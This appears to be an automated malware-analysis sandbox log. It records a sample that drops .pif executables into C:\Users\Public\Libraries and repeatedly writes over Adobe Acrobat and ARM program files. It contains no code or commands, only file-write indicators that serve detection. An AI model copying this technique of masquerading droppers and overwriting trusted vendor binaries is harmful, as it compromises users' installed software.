                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Jwsmvmdw.PIFJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\wdmvmswJ.pifJump to dropped file
                Drops executable to a common third party application directory
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
